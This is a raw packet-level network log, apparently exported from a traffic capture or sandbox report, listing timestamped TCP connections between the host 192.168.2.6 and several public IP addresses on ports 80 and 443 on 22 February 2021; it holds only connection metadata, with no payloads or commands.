                                                                                                                                                Feb 22, 2021 23:44:00.285759926 CET49725443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:00.285864115 CET44349725104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.285916090 CET44349725104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.285928965 CET49725443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:00.285965919 CET44349725104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.285972118 CET49725443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:00.286016941 CET44349725104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.286021948 CET49725443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:00.286060095 CET49725443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:00.286066055 CET44349725104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.286128998 CET49725443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:00.286416054 CET49725443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:00.286446095 CET49725443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:00.383403063 CET4972780192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:00.436528921 CET8049727172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.436677933 CET4972780192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:00.437108040 CET4972780192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:00.490272999 CET8049727172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.891233921 CET8049727172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.891386986 CET4972780192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:00.898751020 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:00.960673094 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:00.960778952 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:00.961514950 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:01.023224115 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:01.026984930 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:01.027015924 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:01.027095079 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:01.039941072 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:01.101803064 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:01.102286100 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:01.102392912 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:01.103214025 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:01.165024042 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.100227118 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.100353003 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.100363970 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.100402117 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.100439072 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.100522995 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.100543976 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.100600004 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.100610971 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.100634098 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.100665092 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.100687981 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.100703955 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.100725889 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.100733042 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.100776911 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.100899935 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.100953102 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.101543903 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.101737022 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.136131048 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.136219025 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.136275053 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.136292934 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.136313915 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.136323929 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.136333942 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.136413097 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.137108088 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.137166023 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.137200117 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.137290001 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.138494015 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.138530016 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.138597012 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.138622046 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.139950991 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.139980078 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.140048981 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.141413927 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.141494989 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.141496897 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.141575098 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.142811060 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.142923117 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.142929077 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.142981052 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.144260883 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.144329071 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.144390106 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.144433022 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.145740032 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.145826101 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.145921946 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.145982981 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.147124052 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.147166014 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.147234917 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.148597956 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.148646116 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.148719072 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.150028944 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.150118113 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.150147915 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.150218964 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.162518024 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.162547112 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.162643909 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.162750959 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.164525986 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.164542913 CET44349728172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.164635897 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.166969061 CET49728443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:02.232208014 CET4971680192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:02.235186100 CET4973180192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:02.303312063 CET80497165.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.303365946 CET80497315.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.303414106 CET4971680192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:02.304224968 CET4973180192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:02.304267883 CET4973180192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:02.372572899 CET80497315.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.372733116 CET80497315.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.372951031 CET4973180192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:02.375029087 CET49732443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:02.445086002 CET443497325.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.445194006 CET49732443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:02.445816994 CET49732443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:02.516112089 CET443497325.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.516158104 CET443497325.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.516244888 CET49732443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:02.516863108 CET49732443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:02.521162987 CET49732443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:02.589546919 CET443497325.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.966470957 CET443497325.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.966516972 CET443497325.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.966557026 CET443497325.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.966587067 CET49732443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:02.966593981 CET443497325.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.966624975 CET49732443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:02.966629028 CET443497325.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.966630936 CET49732443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:02.966665030 CET443497325.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.966665030 CET49732443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:02.966675997 CET49732443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:02.966696024 CET443497325.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:02.966713905 CET49732443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:02.966742992 CET49732443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:02.967122078 CET49732443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:02.967732906 CET4971980192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:02.968877077 CET4973380192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:03.036509037 CET443497325.9.110.84192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:03.036597967 CET49732443192.168.2.65.9.110.84
                                                                                                                                                Feb 22, 2021 23:44:03.132735014 CET8049719192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:03.132867098 CET4971980192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:03.138664961 CET8049733192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:03.138837099 CET4973380192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:03.139276981 CET4973380192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:03.307981968 CET8049733192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:03.308013916 CET8049733192.0.84.247192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:03.308096886 CET4973380192.168.2.6192.0.84.247
                                                                                                                                                Feb 22, 2021 23:44:03.308929920 CET49721443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:03.337169886 CET49735443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:03.355328083 CET44349721216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:03.356739044 CET44349721216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:03.356823921 CET49721443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:03.378904104 CET44349735216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:03.379014969 CET49735443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:03.380033970 CET49735443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:03.422704935 CET44349735216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:03.434328079 CET44349735216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:03.434411049 CET44349735216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:03.434443951 CET44349735216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:03.434477091 CET49735443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:03.434503078 CET49735443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:03.445672989 CET49735443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:03.493201017 CET44349735216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:03.495637894 CET44349735216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:03.495805025 CET49735443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:03.496798038 CET49735443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:03.542052031 CET44349735216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:03.720839024 CET44349735216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:03.720895052 CET44349735216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:03.720935106 CET49735443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:03.720936060 CET44349735216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:03.720966101 CET44349735216.239.32.21192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:03.720993042 CET49735443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:03.721055031 CET49735443192.168.2.6216.239.32.21
                                                                                                                                                Feb 22, 2021 23:44:03.953444004 CET4972280192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:03.954554081 CET4973680192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:04.010437012 CET8049722104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.010528088 CET4972280192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:04.010801077 CET8049736104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.010904074 CET4973680192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:04.011565924 CET4973680192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:04.068542957 CET8049736104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.172714949 CET8049736104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.172837019 CET4973680192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:04.173908949 CET49724443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:04.224410057 CET49738443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:04.231928110 CET44349724104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.231966972 CET44349724104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.232079029 CET49724443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:04.232127905 CET49724443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:04.280913115 CET44349738104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.281028032 CET49738443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:04.281784058 CET49738443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:04.338068962 CET44349738104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.338104963 CET44349738104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.338176966 CET49738443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:04.339092016 CET49738443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:04.349214077 CET49738443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:04.395205975 CET44349738104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.405703068 CET44349738104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.515629053 CET44349738104.244.42.1192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.515785933 CET49738443192.168.2.6104.244.42.1
                                                                                                                                                Feb 22, 2021 23:44:04.518469095 CET49739443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:04.574631929 CET44349739104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.574815989 CET49739443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:04.576211929 CET49739443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:04.633945942 CET44349739104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.633996010 CET44349739104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.634155989 CET49739443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:04.635005951 CET49739443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:04.649076939 CET49739443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:04.691214085 CET44349739104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.705379963 CET44349739104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.830827951 CET44349739104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.830859900 CET44349739104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.830871105 CET44349739104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.830887079 CET44349739104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.830904007 CET44349739104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.830918074 CET44349739104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.830945015 CET44349739104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.830957890 CET44349739104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.830970049 CET44349739104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.830991030 CET49739443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:04.831053972 CET49739443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:04.831418037 CET49739443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:04.831500053 CET49739443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:04.832299948 CET4972780192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:04.833674908 CET4974080192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:04.882363081 CET8049740172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.882500887 CET4974080192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:04.883068085 CET4974080192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:04.885529995 CET8049727172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.885653019 CET4972780192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:04.887703896 CET44349739104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.887727976 CET44349739104.244.42.70192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:04.887815952 CET49739443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:04.887877941 CET49739443192.168.2.6104.244.42.70
                                                                                                                                                Feb 22, 2021 23:44:04.931365013 CET8049740172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:05.456563950 CET8049740172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:05.456965923 CET4974080192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:05.463958025 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:05.511255980 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:05.511483908 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:05.512257099 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:05.559499979 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:05.562951088 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:05.563102961 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:05.564096928 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:05.573556900 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:05.611358881 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:05.620920897 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.371431112 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.371459007 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.371491909 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.371517897 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.371521950 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.371548891 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.371560097 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.371573925 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.371597052 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.371617079 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.371625900 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.371675014 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.372047901 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.372076035 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.403589964 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.403615952 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.403649092 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.403682947 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.403739929 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.403753042 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.403786898 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.403879881 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.404344082 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.404361963 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.404402018 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.404436111 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.405453920 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.405472994 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.405514002 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.406563997 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.406580925 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.406615973 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.406656981 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.407670975 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.407691002 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.407722950 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.407782078 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.408780098 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.408798933 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.408828974 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.408878088 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.409893036 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.409917116 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.409950018 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.410008907 CET49742443192.168.2.6172.67.204.156
                                                                                                                                                Feb 22, 2021 23:44:06.411020041 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.411047935 CET44349742172.67.204.156192.168.2.6
                                                                                                                                                Feb 22, 2021 23:44:06.411096096 CET49742443192.168.2.6172.67.204.156
